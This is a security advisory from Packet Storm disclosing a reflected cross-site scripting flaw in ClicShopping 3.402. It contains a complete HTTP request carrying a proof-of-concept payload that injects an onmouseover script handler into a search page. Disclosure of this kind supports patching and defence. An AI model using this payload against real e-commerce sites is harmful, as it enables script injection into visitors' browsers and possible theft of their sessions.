Lucene search

K
packetstormNu11secur1tyPACKETSTORM:169946
HistoryNov 21, 2022 - 12:00 a.m.

ClicShopping 3.402 Cross Site Scripting

2022-11-2100:00:00
nu11secur1ty
packetstormsecurity.com
201
`## Title: ClicShopping_V3-Version3.402 XSS-Reflected  
## Author: nu11secur1ty  
## Date: 11.20.2022  
## Vendor: https://www.clicshopping.org/forum/  
## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3  
  
## Description:  
The name of an arbitrarily supplied URL parameter is copied into the  
value of an HTML tag attribute which is encapsulated in double  
quotation marks.  
The attacker can trick users to open a very dangerous link or he can  
get sensitive information, also he can destroy some components of your  
system.  
  
## STATUS: HIGH Vulnerability  
  
[+] Payload:  
  
```js  
GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1  
HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)  
  
## Proof and Exploit:  
[href](https://streamable.com/mgbftx)  
  
## Time spent  
`1:00`  
  
  
`